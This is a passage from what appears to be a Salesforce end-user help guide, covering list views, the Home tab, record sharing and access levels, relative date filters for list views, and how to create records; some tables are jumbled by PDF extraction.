• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views.

To edit or delete any view you created, select it from the View drop-down list and click Edit.

• At the top of a list, click a letter to show items that correspond to that letter, or click Other to show items whose names
begin with numbers or symbols. Click All to display all items that match the criteria of the current view.

• To sort list view items by the data in a particular column, click that column’s heading. This sorts text data alphabetically
and numerical data in ascending order. Dates are sorted with the most recent date first. To reverse the sort order, click the
column heading a second time.

Note:  You can sort by any custom field except multi-select picklists. User list views are not sorted for organizations
with more than two million users. Organizations with more than 2 million users can contact salesforce.com to
reenable sorting.

• Click the Previous Page or Next Page link to go to the previous or next set of items in the current view.

• At the bottom of a list, click the fewer or more link to decrease or increase the number of items per page.

In some related lists with many items, the following links are available:

• Click Show [number] more to increase the number of items in the list.

• Click Go to list to display a secondary page of the entire related list.

Changing Your Working Division
You can change which records you are viewing by selecting the division you are currently working in.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

You can change the division you are working in at any time and override the default division you were originally assigned for
some searches and reports.

• From the Divisions field in the sidebar, select the division you want to work in.
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Note:  Records you create are assigned to you default division, not to your working division. You can explicitly set a
division other than your default division when you create the record.

See Also:
Divisions Overview
Using Divisions in Search and List Views
Reporting With Divisions

MANAGE YOUR WORK FROM THE HOME TAB

Home Tab Overview
The available tabs and options in the Create New drop-down list vary according to which permissions you have and which
Salesforce edition you are using.

From the Home tab, you can:

• Create a Chatter post (if your organization uses Chatter)

• View dashboard snapshots

• View your tasks and calendar

•
Search the feed ( )

You can also use the sidebar components, such as Create New, Recent Items, and Custom Links, that you’ll also see on other
Salesforce pages. Your Home page layout, sidebar components, and links are enabled and configured by your administrator.

Alert banners may appear on the Home tab to let you know when updates are available for desktop clients such as Connect
for Outlook and Connect Offline.

Changing Your Home Tab Dashboard
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Your administrator can create customized Home tab pages that display customized components such as a dashboard snapshot
or your company logo. If your Home tab contains a dashboard snapshot, you can change the dashboard settings.

Click Customize Page in the Dashboard section of the Home tab if yours contains a dashboard. Use this page to select a
different dashboard to display on the Home tab. Click Refresh to refresh the data in your dashboard.
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Using Your Tasks and Calendar on the Home Page
Available in: All Editions except Database.com

Note:  The My Tasks and Calendar sections display on the Home page if they are included as components on your
Home page layout.

From the Home page, you can view, create, and edit tasks and events. If you have Salesforce for Outlook, Connect for Outlook
or Connect for Lotus Notes installed, you may be able to sync your Outlook or Lotus Notes records with Salesforce so they
appear in the My Tasks and Calendar sections.

In the My Tasks section, you can:

• Click New to create a task.
• View a list of tasks assigned to you. Up to fifteen tasks can be displayed; to view all your tasks, click View More.

 identifies tasks that are part of a recurring series.

• Choose a time frame from the drop-down list to change which tasks display.
• Assign unresolved emails to related records; to view all your unassigned emails, click My Unresolved Items.
• If your organization has enabled hover links for the My Tasks list, hover your mouse over the subject of a task to see the

details of the task in an overlay. Alternatively, click the subject of a task to open the detail page of that task.
• Click X to close a task.

In the Calendar section, you can:

• Click New Event to create a new event.
• Click the Scheduled Meetings subtab to view a list of the events you have scheduled for the next seven days. This tab

displays a maximum of 50 events per day.

◊  identifies events that are part of a recurring series.
◊  identifies events with invitees. Multi-person events aren't available in Personal Edition.
◊ If your organization has enabled home page hover links for events, hover your mouse over the subject of an event to

display the details of the event in an interactive overlay. Alternatively, click the subject of an event to open the detail
page of that event.

• Click the Requested Meetings subtab to view meetings you have requested but not confirmed. This tab displays a maximum
of 100 requested meetings.

◊ Click the subject of the meeting to open its detail page where you can cancel and reschedule the meeting.
◊ The Responses column shows the number of invitees that have responded to your meeting request.
◊ Once you confirm a meeting, it appears on the Scheduled Meetings subtab.

If the Requested Meetings subtab doesn't appear, ask your Salesforce administrator to add it to the Calendar section.

• View a small calendar of the current month. To change which month appears, click  and .
• Navigate to different views of your calendar and click the icons underneath the small monthly calendar as appropriate.
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Viewing Custom Links on the Home Tab
Available in: All Editions except Database.com

This section appears on the Home tab depending on your customized home page layout.

The Custom Links section of the Home tab contains links to websites or Salesforce pages that are useful for everyone in your
organization. Your administrator sets which links appear in this section.

Viewing Messages and Alerts
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

The Messages and Alerts section of the Home tab sidebar displays announcements customized by your organization's
administrator. The Messages and Alerts section is not available in Personal Edition.

See Also:
Checking for Desktop Client Updates

MANAGE RELATIONSHIPS AND DATA WITH RECORDS

VIEW AND SHARE RECORDS

Finding and Viewing Records and Data
Use tabs, search, or lists to look at your data.

Available in: All Editions

Your Salesforce data is stored in individual records. For example, if the Acme company is one of your accounts, you’ll have an
account record for Acme.

You can view your records different ways.
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• Click a tab like Accounts or Contacts, select a view, and click Go to see a list of the records you are allowed to view. The
results you see are called a list view.

• Search for a record using keywords, such as a name or address stored in the record. Use the search bar in the banner
displayed on most pages.

• On many records, below the main page sections, look for related lists, which identify records that are associated with the
record you’re currently viewing. For example, an account record probably has a related list of contacts at that account.

See Also:
Understanding Salesforce Pages

Viewing and Editing Google Docs, Notes, and Attachments
Notes and attachments are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer
Editions

Google Docs available in all editions

You can create, view, and edit notes and add attachments from the Notes and Attachments related list on selected detail pages
such as accounts, contacts, leads, opportunities, and products. You can also add attachments from the Attachments related
list on selected detail pages such as cases, solutions, and campaigns.

If Chatter is enabled for your organization, files posted to a feed on a record are added to the record's Notes and Attachments
related list as feed attachments. You can preview (if available), download, and delete feed attachments from the Notes and
Attachments related list, but you can't edit them. You can view feed attachment details by clicking on the title of the file.

Note:  If the Add Google Docs to Salesforce service is enabled in your organization, the Notes and Attachments
related list is entitled Google Docs, Notes & Attachments, and the Attachments related list is entitled Google Docs
& Attachments.

• To view the contents of a note, click the title of the note.

• To view the details of all notes, attachments, or Google docs, click View All.
• To view the details of an attachment, click the title of the file and then select the link on the Attached File detail page.

To view the details of a feed attachment, click the title of the file.
• To edit a note or the title of an attachment, click Edit and make the changes you want. You can't edit the attached file

directly and you can't edit feed attachments.
• To create a new Google doc, choose New Document, New Spreadsheet, or New Presentation from the Add Google

Doc drop-down button.
• To associate an existing Google doc with the Salesforce record, choose Add Existing from the Add Google Doc drop-down

button.
• To edit the title or URL of a Google doc, click Edit.
• To delete a Google doc from the related list, click Del. This action removes the document's association with the record

but does not delete the document in Google Apps.
• To view and modify the Google doc, click View.

Consider the following when working with notes, attachments, and Google docs:
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• To access a Google doc from a record detail page, the doc must be shared with your Google Apps account.

• When a file is attached to a record’s Chatter feed it’s added to the Notes and Attachments related list as a feed attachment.
The file size limit for Chatter feed attachments is 2 GB.

• All notes and attachments added to contacts and opportunities roll up under the associated account as well.

• You cannot edit a note or attachment unless you also have access to edit the record associated with it.

• To delete a note or attachment, you must be the owner of the note or attachment or an administrator with the “Modify
all Data” permission. Note ownership is determined by the owner field. Attachment ownership is determined by the created
by field.

• Record owners (except Portal users) can delete attachments on records.

• Notes and attachments marked as private via the Private checkbox are accessible only to the person who attached them
and administrators. For administrators to view private notes and attachments, they need the “View All Data” permission;
to edit or delete them, they need the “Modify All Data” permission.

• The Notes and Attachments related list includes files from Salesforce CRM Content when they are posted to a Chatter
feed on a record. However, the Notes and Attachments related list does not include Salesforce CRM Content files that
only exist in Salesforce CRM Content. If your organization has Salesforce CRM Content enabled, you can add the Related
Content related list to the detail pages for accounts, contacts, leads, opportunities, cases, products, or custom objects.

• Click Preview next to a feed attachment to display a preview of the file. Not all files can be previewed, such as copy-protected
PDFs, unknown file types, and any file larger than 25 MB. For files that can’t be previewed, the Preview option isn’t
available on feeds or list views, and files appear as generic file type icons in the feed. Some Microsoft Office 2007 features
don't display correctly in previews.

• If Chatter is enabled for your organization, feed attachments are included in the Notes and Attachments related list. Portal
users can download feed attachments, but can’t preview, edit, or delete them.

See Also:
Adding Notes to Records

Granting Access to Records
Sharing for accounts and contacts is available in: Professional, Enterprise, Unlimited, and Developer Editions

Sharing for campaigns, cases, custom object records, leads, and opportunities is available in Enterprise, Unlimited, and
Developer Editions

Sharing for custom objects is available in Database.com

Users can manually grant other users access to certain kinds of records, including accounts, contacts, and leads. In some cases,
granting access to one record includes access to all its associated records. For example, if you grant another user access to an
account, the user will automatically have access to all the opportunities and cases associated with that account.

To grant access to a record, you must be one of these.

• The record owner

• A user in a role above the owner in the hierarchy (if your organization’s sharing settings control access through hierarchies)

• Any user granted “Full Access” to the record

• An administrator
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To grant access to a record:

1. Click Sharing on the record you want to share.
2. Click Add.
3. From the Search drop-down list, select the type of group, user, role, or territory to add.

Depending on the data in your organization, your options can include:

DescriptionType

All public groups defined by your administrator.Public Groups

All personal groups defined by the record owner. Only the
record owner can share with his or her personal groups.

Personal Groups

All users in your organization. Does not include portal users.Users

All roles defined for your organization. This includes all of
the users in each role.

Roles

All of the users in the role plus all of the users in roles below
that role in the hierarchy. Only available when no portals
are enabled for your organization.

Roles and Subordinates

All roles defined for your organization. This includes all of
the users in the specified role plus all of the users in roles

Roles and Internal Subordinates

below that role, excluding partner portal and Customer
Portal roles.

Adds a role and its subordinate roles. Includes all of the users
in that role plus all of the users in roles below that role. Only

Roles and Internal and Portal Subordinates

available when a partner or Customer Portal is enabled for
your organization. Includes portal roles and users.

For organizations that use territory management, all
territories defined for your organization, including all users
in each territory.

Territories

For organizations that use territory management, all users
in the territory plus the users below that territory.

Territories and Subordinates

4. Choose the specific groups, users, roles, or territories who should have access by adding their names to the Share With
list. Use the Add and Remove arrows to move the items from the Available list to the Share With list.

5. Choose the access level for the record you are sharing and any associated records that you own.

Note:

• If you’re sharing an opportunity or case, those you share it with must also have at least “Read” access to the
associated account (unless you are sharing a case via a case team). If you also have privileges to share the account
itself, those you share it with are automatically given “Read” access to the account. If you do not have privileges
to share the account, you must ask the account owner to give others “Read” access to it.

• Contact Access is not available when the organization-wide default for contacts is set to Controlled by
Parent.
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• For sharing rules that specify access for associated object records, the given access level applies to that sharing
rule only. For example, if an account sharing rule specifies Private as the access level for associated contacts,
a user may still have access to associated contacts via other means, such as organization-wide defaults, the
“Modify All Data” or “View All Data” permission, or the “Modify All” or “View All” permission for contacts.

6. When sharing a forecast, select Submit Allowed to enable the user, group, or role to submit the forecast.
7. Select the reason you’re sharing the record so users and administrators can understand.
8. Click Save.

Editing or Deleting Record Access

To edit the access levels for a record, click Sharing on the record, and then click Edit next to the group, user, role, or territory
whose access you want to modify.

To delete the sharing access for a group, user, role, or territory, click Sharing on the record, and then click Del next to the
group, user, role, or territory whose access you want to remove.

Manual shares are deleted automatically if the record owner is changed or if they are no longer needed, such as when the
organization-wide defaults grant a similar or wider access than the manual share.

See Also:
Understanding Your Access to UI Elements, Records, and Fields
Viewing Which Users Have Access to Your Records
Record Access Levels

Viewing Which Users Have Access to Your Records
Available in: Professional, Enterprise, Unlimited, and Developer Editions

After you have granted access to a record you own, you can view a list of users who have access to the record and its related
information and records, including their access level and an explanation. The list shows every user who has access that is greater
than the organization-wide default settings.

For forecast sharing, the list shows whether the user can submit a forecast (in forecasting versions where sharing is
available).High-volume portal users and Customer Portal super users are excluded from this list.

Note: For sharing rules that specify access for associated object records, the given access level applies to that sharing
rule only. For example, if an account sharing rule specifies Private as the access level for associated contacts, a user
may still have access to associated contacts via other means, such as organization-wide defaults, the “Modify All Data”
or “View All Data” permission, or the “Modify All” or “View All” permission for contacts.

1. Click Sharing on the desired record.
2. Click Expand List.
3. Click Why? next to a user’s name to see the reason the user has access to the record.

If there are multiple reasons with different access levels, the user is always granted the most permissive access level.

The possible reasons are:
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DescriptionReason

The user has access via an account sharing rule created by
the administrator.

Account Sharing Rule

The user was granted access via the Sharing button on the
associated account.

Account Sharing

The user is a member of the account team.Account Team

The account has been assigned to a territory to which the
user has access.

Account Territory

The user has access via an account territory sharing rule
created by the administrator.

Account Territory Rule

The user has the “Modify All Data” or “View All Data”
administrative permission, or the “Modify All” or “View All”
object permission.

Administrator

The portal user or any role above the portal user's role has
access to the account for which the portal user is a contact.

Associated Portal User or Role

The user owns or has sharing access to a contact or contract
associated with the account. Click the link to view which

Associated Record Owner or Sharing

associated records the user owns or has been given sharing
access to.

The user is a member of a share group that has access to a
contact or contract that's associated with the account owned
by high-volume portal users.

Associated Record Sharing

The user has access via a campaign sharing rule created by
the administrator.

Campaign Sharing Rule

The user has access via a case sharing rule created by the
administrator.

Case Sharing Rule

The user has access via a contact sharing rule created by the
administrator.

Contact Sharing Rule

A user has access to forecast data that was granted via the
Sharing button on the forecast (in forecasting versions where
sharing is available).

Delegated Forecast Manager

A user has access due to being a forecast manager in the
forecast hierarchy.

Forecast Manager

The user has access via a lead sharing rule created by the
administrator.

Lead Sharing Rule

The user has a subordinate in the role hierarchy who is
assigned to the territory with which the account is associated.

Manager of Territory Member

The user has access that was granted via the Sharing button
on the record.

Manual Sharing
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DescriptionReason

The account has been manually assigned to a territory to
which the user has access.

Manual Territory Sharing

The user has access via an opportunity sharing rule created
by the administrator.

Opportunity Sharing Rule

The user owns the record, or the user is a member of the
queue that owns the record or above the queue member in
the role hierarchy.

Owner

The user is a member of a share group that has access to
records owned by high-volume portal users.

Portal Share Group

The portal user is a contact on the case.Related Portal User

The user's role is above the role of a portal user who has
access to the record via ownership or sharing.

Role Above Owner or Shared User (Portal Only)

The user is a member of the opportunity sales team.Sales Team

The user has the “View All Forecasts” permission.View All Forecasts Permission

See Also:
Understanding Your Access to UI Elements, Records, and Fields
Granting Access to Records

Record Access Levels
Sharing for accounts and contacts is available in: Professional, Enterprise, Unlimited, and Developer Editions

Sharing for campaigns, cases, custom object records, leads, and opportunities is available in Enterprise, Unlimited, and
Developer Editions

Sharing for custom objects is available in Database.com

When you share records with other users, you can assign them different levels of access to the records.

The available access levels are:

DescriptionAccess Level

User can view, edit, delete, and transfer the record. User can
also extend sharing access to other users; however, the user
cannot grant Full Access to other users.

Full Access

User can view and edit the record, and add associated records,
notes, and attachments to it.

Read/Write
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DescriptionAccess Level

User can view the record, and add associated records to it.
They cannot edit the record or add notes or attachments.

Read Only

User cannot access the record in any way.Private

See Also:
Understanding Your Access to UI Elements, Records, and Fields
Viewing Which Users Have Access to Your Records

Creating Custom List Views
Available in: All Editions

User Permissions Needed

“Read” on the type of record included in the listTo create custom list views:

“Manage Public List Views”To create, edit, or delete public list views:

You can create new list views to see a specific set of records such as contacts, documents, or campaigns. For example, create
a list view of accounts in your state, leads with a specific Lead Source, or opportunities above a particular Amount. You can
also create views of contacts, leads, users, or cases to use for mass email recipient lists.

To edit or delete any view you created, click Edit next to the View drop-down list. Administrators, and users with the “Manage
Public List Views” permission, can also edit or delete public views and some of the standard Salesforce views. Users without
the “Manage Public List Views” permission see the Clone link instead of Edit so they can clone a public or standard view.

To create a new view, click Create New View at the top of any list page or in the Views section of any tab home page.

1. Enter View Name

Enter the name to appear in the View drop-down list.

2. If you have the “Customize Application” permission, enter a unique name to be used by the API and managed packages.
3. Specify Filter Criteria

Filter by Owner

These options vary depending on the kind of record. In general, select All... or My... to specify the set of records
to search. There may be additional options:
• Lead and case list views can be restricted by queue.
• Price book list views can be restricted by price book.
• Activity list views have several options.
• If your organization has territory management, account and opportunity list views can be restricted by My

Territories or My Territory Teams. My Territories means records associated with territories to
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which you belong. My Territory Teams means records associated with either territories to which you belong
or territories below you in the territory hierarchy.

• If your organization has case teams, case list views can be restricted by My Case Teams.
• If your organization has account teams, account list views can be restricted by My Account Teams.
• If your organization has opportunity teams, opportunity list views can be restricted by My Opportunity Teams.

Filter by Campaign

This option is available on these list views:
• Contacts home
• Leads home
• Mass email contacts
• Mass email leads
• Mass add campaign members wizard
• Mass update campaign members wizard

If you are editing a list view that is filtered by campaign, and do not have at least read access to the campaign, you
will receive an error when attempting to save the list view.

Filter by Division

If your organization uses divisions to segment data and you have the “Affected by Divisions” permission, select the
division that records in the list view must match. This option is disabled if you are not searching all records.

Select --Current-- to show records in your current working division.

Filter by Additional Fields

Optionally, enter filter criteria to specify conditions that the selected items must match, for example, Lead Source
equals Web. You can also use special date values in your filter criteria.

Note:  When you select the Created Date field in a list view filter, the value you specify can only be a
date and not a time. This restriction does not apply to other filters.

4. Select Fields to Display

The default fields are automatically selected. You can choose up to 15 different fields to display in your view. You can
display only the fields that are available in your page layout. When you select a long text area field, up to 255 characters
are displayed in the list view.

a. To add or remove fields, select a field name, and click the Add or Remove arrow.
b. Use the arrows to arrange the fields in the proper sequence.

5. Restrict Visibility

If you are an administrator or a user with the “Manage Public List Views” permission, specify whether everyone or just
you can see the custom view. This option is not available in Personal Edition. To see a list view, users must also have the
appropriate “Read” permission on the type of records within the list view.

Alternatively, Enterprise, Unlimited, and Developer Edition users can specify a public group, role, or role including all
users below that role to see the custom view. To share the list view, select Visible to certain groups of users,
choose the type of group or role from the drop-down list, select the group or role from the list below it, and click Add.
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Note:  List views are visible to your customers in the Salesforce Customer Portal if the Visible to all users
radio button is selected for views on objects assigned to Customer Portal users' profiles. To create list views that
only your Salesforce users can see, select Visible to certain groups of users, and then share it with
the All Internal Users group or a selected set of internal groups and roles.

When implementing a Customer Portal, create custom views that contain only relevant information for Customer
Portal users, and then make those views visible to Customer Portal users by sharing them with the All Customer
Portal Users group or a selected set of portal groups and roles.

6. Click Save. The view appears in the View drop-down list so you can access it later.

You can rename an existing list view and click Save As to save the criteria of the list view without altering the original
view.

To navigate back to the last list page you viewed, click Back to list at the top of any detail page.

Note:  The information you see in list views is only the data to which you have access—either records you own or
have read or read/write access to, records that have been shared to you, or records owned by or shared with users in
roles below you in the role hierarchy.

In addition, you can view only those fields that are visible in your page layout and field-level security settings. Archived
activities are not included in activity list views. You can use the Activity History related list to view these activities.

Sorting List Views
Available in: All Editions

User Permissions Needed

“Read” on the records in the listTo sort a list view:

Lots of objects let you view related records in lists, also called “list views”. If your list is long, or you want to print it, you might
want to sort the records by one of the field columns. For example, the All Accounts list view can be sorted by the Account
Name field column, Billing State/Province field column, and others. Custom list views can be sorted by their own
field columns. Sorting is alphanumeric.

1. Open the list view.
2. Click the header for the field column you want to sort by.

An arrow appears, to tell you how the list is sorted: from the column’s first record ) (alphanumerically) or its last ( ).

Note:  Starting in Spring ‘13, list views for the Users object in organizations that have more than two million users
cannot be sorted.

See Also:
Creating Custom List Views
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Printing List Views
Available in: All Editions except Database.com

User Permissions Needed

“Read” on the records included in the listTo print list views:

If printable list views are enabled for your organization, you can print standard list views and custom list views.

1. Go to the list view you want to print. For example: All Accounts on the Accounts tab.
2. Sort the contents of the list view if you want to.
3. Click .
4. In the new window, select the number of records you want to print—up to 1,000. (To print more than 1,000 records, run

a report and then click Printable View on the report.)
5. Click Print This Page.

Deleting List Views
Available in: All Editions

To delete one of your custom views, select the view from the drop-down list and click the Edit link. At the top of the page,
click the Delete button.

See Also:
Creating Custom List Views

Understanding Relative Date Values for Filter Criteria
When you create a list view that includes a filter for a range of dates, such as Create Date or Last Update Date, use
one or more of the relative date values provided to specify the range.

Available in: All Editions

For example, to create a custom view or report of accounts created the previous week, enter “Create Date equals LAST WEEK.”
For relative date values with variables (such as “NEXT N DAYS”), substitute N with any number greater than zero.

Relative date values are not case-sensitive. You can use “LAST WEEK” or “last week.”

You can use multiple range values in a single field, separated by commas.
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Note: For Enterprise, Unlimited, Professional, and Developer Editions, the week is defined by the Locale drop-down
list on your personal information page. For Contact Manager, Group, and Personal Editions, the week is defined by
the Locale setting in the company profile . For example, when the Locale is US English, a week runs Sunday to
Saturday, whereas with UK English, a week spans Monday to Sunday.

RangeRelative Date Value

Starts at 12:00:00 a.m. on the day before the current day and continues for
24 hours.

YESTERDAY

Starts at 12:00:00 a.m. on the current day and continues for 24 hours.TODAY

Starts at 12:00:00 a.m. on the day after the current day and continues for 24
hours.

TOMORROW

Starts at 12:00:00 a.m. on the first day of the week before the current week
and continues for seven days.

LAST WEEK

Starts at 12:00:00 a.m. on the first day of the current week and continues
for seven days.

THIS WEEK

Starts at 12:00:00 a.m. on the first day of the week after the current week
and continues for seven days.

NEXT WEEK

Starts at 12:00:00 a.m. on the first day of the week that started n weeks
before the current week, and continues up to the current second.

LAST n WEEKS

Starts at 12:00:00 a.m. on the first day of the week after the current week
and continues for n times seven days.

NEXT n WEEKS

Starts at 12:00:00 a.m. on the first day of the week that started n weeks
before the start of the current week and continues for seven days.

n WEEKS AGO

Starts at 12:00:00 a.m. on the first day of the month before the current
month and continues for all the days of that month.

LAST MONTH

Starts at 12:00:00 a.m. on the first day of the current month and continues
for all the days of that month.

THIS MONTH

Starts at 12:00:00 a.m. on the first day of the month after the current month
and continues until the end of the nth month.

NEXT n MONTHS

Starts at 12:00:00 a.m. on the first day of the month that started n months
before the current month and continues up to the current second.

LAST n MONTHS

Starts at 12:00:00 a.m. on the first day of the month that started n months
before the start of the current month and continues for all the days of that
month.

n MONTHS AGO

Starts at 12:00:00 a.m. on the first day of the month after the current month
and continues for all the days of that month.

NEXT MONTH

Starts at 12:00:00 a.m. 90 days before the current day and continues up to
the current second. (The range includes today.)

LAST 90 DAYS

Starts at 12:00:00 a.m. on the day after the current day and continues for 90
days. (The range does not include today.)

NEXT 90 DAYS

Starts at 12:00:00 a.m. n days before the current day and continues up to
the current second. (The range includes today.)

LAST n DAYS
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RangeRelative Date Value

Starts at 12:00:00 a.m. on the next day and continues for the next n days.
(The range does not include today.)

NEXT n DAYS

Starts at 12:00:00 a.m. on the day n days before the current day and continues
for 24 hours. (The range does not include today.)

n DAYS AGO

Starts at 12:00:00 a.m. on the first day of the calendar quarter before the
current calendar quarter and continues to the end of that quarter.

LAST QUARTER

Starts at 12:00:00 a.m. on the first day of the current calendar quarter and
continues to the end of the quarter.

THIS QUARTER

Starts at 12:00:00 a.m. on the first day of the calendar quarter after the
current calendar quarter and continues to the end of that quarter.

NEXT QUARTER

Starts at 12:00:00 a.m. on the first day of the calendar quarter n quarters ago
and continues to the end of the calendar quarter before the current quarter.
(The range does not include the current quarter.)

LAST n QUARTERS

Starts at 12:00:00 a.m. on the first day of the calendar quarter after the
current quarter and continues to the end of the calendar quarter n quarters
in the future. (The range does not include the current quarter.)

NEXT n QUARTERS

Starts at 12:00:00 a.m. on the first day of the calendar quarter n quarters
before the current calendar quarter and continues to the end of that quarter.

n QUARTERS AGO

Starts at 12:00:00 a.m. on January 1 of the year before the current year and
continues through the end of December 31 of that year.

LAST YEAR

Starts at 12:00:00 a.m. on January 1 of the current year and continues through
the end of December 31 of the current year.

THIS YEAR

Starts at 12:00:00 a.m. on January 1 of the year after the current year and
continues through the end of December 31 of that year.

NEXT YEAR

Starts at 12:00:00 a.m. on January 1 of the calendar year n years before the
current calendar year and continues through the end of December 31 of that
year.

n YEARS AGO

Starts at 12:00:00 am on January 1, n+1 years ago. The range ends on
December 31 of the year before the current year.

LAST n YEARS

Starts at 12:00:00 a.m. on January 1 of the year after the current year and
continues through the end of December 31 of the nth year.

NEXT n YEARS

Starts at 12:00:00 a.m. on the first day of the fiscal quarter before the current
fiscal quarter and continues through the last day of that fiscal quarter. The
fiscal quarter is defined in Setup at Company Profile > Fiscal Year.

LAST FISCAL QUARTER

Note: None of the FISCAL literal date values are supported when
creating mobile custom views.

Starts at 12:00:00 a.m. on the first day of the current fiscal quarter and
continues through the end of the last day of the current fiscal quarter. The
fiscal quarter is defined in Setup at Company Profile > Fiscal Year.

THIS FISCAL QUARTER
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RangeRelative Date Value

Starts at 12:00:00 a.m. on the first day of the fiscal quarter after the current
fiscal quarter and continues through the last day of that fiscal quarter. (The

NEXT FISCAL QUARTER

range does not include the current quarter.) The fiscal quarter is defined in
Setup at Company Profile > Fiscal Year.

Starts at 12:00:00 a.m. on the first day of the fiscal quarter n fiscal quarters
ago and continues through the end of the last day of the previous fiscal

LAST n FISCAL QUARTERS

quarter. (The range does not include the current fiscal quarter.) The fiscal
quarter is defined in Setup at Company Profile > Fiscal Year.

Starts at 12:00:00 a.m. on the first day of the fiscal quarter after the current
fiscal quarter and continues through the end of the last day of the nth fiscal

NEXT n FISCAL QUARTERS

quarter. (The range does not include the current fiscal quarter.) The fiscal
quarter is defined in Setup at Company Profile > Fiscal Year.

Starts at 12:00:00 a.m. on the first day of the fiscal quarter n fiscal quarters
before the current fiscal quarter and continues through the end of the last
day of that fiscal quarter.

n FISCAL QUARTERS AGO

Starts at 12:00:00 a.m. on the first day of the fiscal year before the current
fiscal year and continues through the end of the last day of that fiscal year.
The fiscal year is defined in Setup at Company Profile > Fiscal Year.

LAST FISCAL YEAR

Starts at 12:00:00 a.m. on the first day of the current fiscal year and continues
through the end of the last day of the fiscal year. The fiscal year is defined
in Setup at Company Profile > Fiscal Year.

THIS FISCAL YEAR

Starts at 12:00:00 a.m. on the first day of the fiscal year after the current
fiscal year and continues through the end of the last day of that fiscal year.
The fiscal year is defined in Setup at Company Profile > Fiscal Year.

NEXT FISCAL YEAR

Starts at 12:00:00 a.m. on the first day of the fiscal year n fiscal years ago
and continues through the end of the last day of the fiscal year before the

LAST n FISCAL YEARS

current fiscal year. (The range does not include the current fiscal year.) The
fiscal year is defined in Setup at Company Profile > Fiscal Year.

Starts at 12:00:00 a.m. on the first day of the fiscal year after the current
fiscal year and continues through the end of the last day of the nth fiscal

NEXT n FISCAL YEARS

year. (The range does not include the current fiscal year.) The fiscal year is
defined in Setup at Company Profile > Fiscal Year.

Starts at 12:00:00 a.m. on the first day of the fiscal year n fiscal years ago
and continues through the end of the last day of that fiscal year.

n FISCAL YEARS AGO
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VIEW AND SHARE FAQ

How does the sharing model work?
In Professional, Enterprise, Unlimited, and Developer Edition organizations, the administrator can define the default sharing
model for your organization by setting organization-wide defaults. Organization-wide defaults specify the default level of
access to records. For most objects, organization-wide defaults can be set to Private, Public Read Only, or Public Read/Write.

In environments where the sharing model for an object has been set to Private or Public Read Only, an administrator can
grant users additional access to records by setting up a role hierarchy and defining sharing rules. Role hierarchies and sharing
rules can only be used to grant additional access—they cannot be used to restrict access to records beyond what was originally
specified with the sharing model through organization-wide defaults.

After restricting access using organization-wide defaults, users typically get access through one or more of these methods:

• Role hierarchy
• Sharing rules
• Manual sharing
• Implicit access (Accounts and associated child records)
• Teams (Account, Case, and Opportunity)

Which kinds of records can I print list views for?
If printable list views are enabled for your organization, you can print standard and custom list views for these kinds of records.

• Accounts

• Activities

• Campaigns

• Cases

• Contacts

• Contracts

• Custom objects

• Documents

• Leads

• Opportunities

• Permission sets

• Price books

• Profiles

• Products

• Reports

• Solutions
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CREATE RECORDS

Creating Records
Available in: All Editions

Creating records is standard procedure for most Salesforce users. While some objects (such as Account) have special guidelines
and considerations you need to be aware of, the process of creating a record is similar for all.

Depending on how your administrator has set up your Salesforce organization, you can create records in a few different ways.

• From object tabs

• In feeds on the home page, Chatter tab, and record detail pages

• With the Create New drop-down list in the sidebar

• With Quick Create

See Also:
Editing Records
Deleting Records
Guidelines for Entering Currency, Dates, Times, and Phone Numbers
Adding Notes to Records
Attaching Files to Records

Creating Records from Object Tabs

Available in: All Editions

User Permissions Needed

“Create” on the object for the kind of record you’re creatingTo create records:

Before you create a record, make sure you’re aware of any guidelines for the kind of record you’re creating.

1. Click the tab for the kind of record you want to create. You’ll start from that object’s Home page. For example, click the
Accounts tab if you want to create an account record.

2. Click New.
3. Select a record type if you’re prompted to.
4. Enter values in the fields. Required fields are identified with a red bar ( ).
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Tip: Most objects have field definitions in the Salesforce help. Just search the help for the object name + “fields”.
For example, if you’re creating or editing an account record and want to know more about your options in the
Industry drop-down list, look up “Account Fields” in the help.

5. When you finish entering values for your new record, click Save, or click Save & New to save the current record and create
another. If you navigate away from the page before clicking Save, you may lose your changes.

See Also:
Creating Records in Feeds
Creating Records with Quick Create
Creating Records

Creating Records in Feeds

Available in: All Editions

User Permissions Needed

“Create” on the object for the kind of record you’re creatingTo create records:

Depending on how your administrator has set up Salesforce, you may be able to create records in the feed on the home page,
the Chatter tab, and record detail pages. Publishers on different feeds may have different actions available; check with your
administrator for information on what you can do in each feed. Before you create a record, make sure you’re aware of any
guidelines for the kind of record you’re creating.

1. In the feed in which you want to create a record, click the publisher action that corresponds to the kind of record you want
to create.

2. Enter values in the fields. Required fields are identified with a red bar ( ).
Most objects have field definitions in the Salesforce help. Just search the help for the object name + “fields”. For example,
if you’re creating or editing an account record and want to know more about your options in the Industry drop-down
list, look up “Account Fields” in the help.

3. When you finish entering values for your new record, click Create.

A feed item for the record you’ve created appears:

• In the feed in which you created the record.
• As the first item in the feed for the new record itself.
• In your Chatter feed.
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• In the Chatter feed of anyone who follows the record from which you created the new record. For example, if you create
a contact from the record detail page for the account ABC Industries, anyone who follows ABC Industries will see a feed
item for the contact record you created.

See Also:
Creating Records from Object Tabs
Creating Records with Quick Create
Creating Records
Feeds Overview

Creating Records Using the Create New Drop-Down List

The available options in the Create New drop-down list vary according to which permissions you have, which Salesforce
Edition you are using, and which app you are using.

The Create New drop-down list, available in the sidebar, provides options to create new records. To create a new record using
the drop-down list:

1. Select the type of record you want to create. The new record page immediately displays in the appropriate tab or the Upload
a File dialog box displays if you selected File.

2. Fill in the fields.
3. Click Save or Upload to My Files if you selected File.

Creating Records with Quick Create

Available in: All Editions

User Permissions Needed

“Create” on the object for the kind of record you’re creatingTo create records:

If your administrator has enabled Quick Create, you can create records from the home pages for leads, accounts, contacts, and
opportunities. You can also create accounts from the Account lookup field results list on the Quick Create form on contacts,
leads, and opportunities. Validation rules don’t apply when you create new records with Quick Create.

1. Click the tab for the kind of record you want to create. To create an account while you create a contact, lead or opportunity,

click the  icon next to the Account field in the Quick Create form you’re using.
2. Enter values in the fields. Required fields are identified with a red bar ( ).
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Most objects have field definitions in the Salesforce help. Just search the help for the object name + “fields”. For example,
if you’re creating or editing an account record and want to know more about your options in the Industry drop-down
list, look up “Account Fields” in the help.

3. Click Save.

See Also:
Creating Records from Object Tabs
Creating Records in Feeds
Creating Records

Selecting Picklist Values
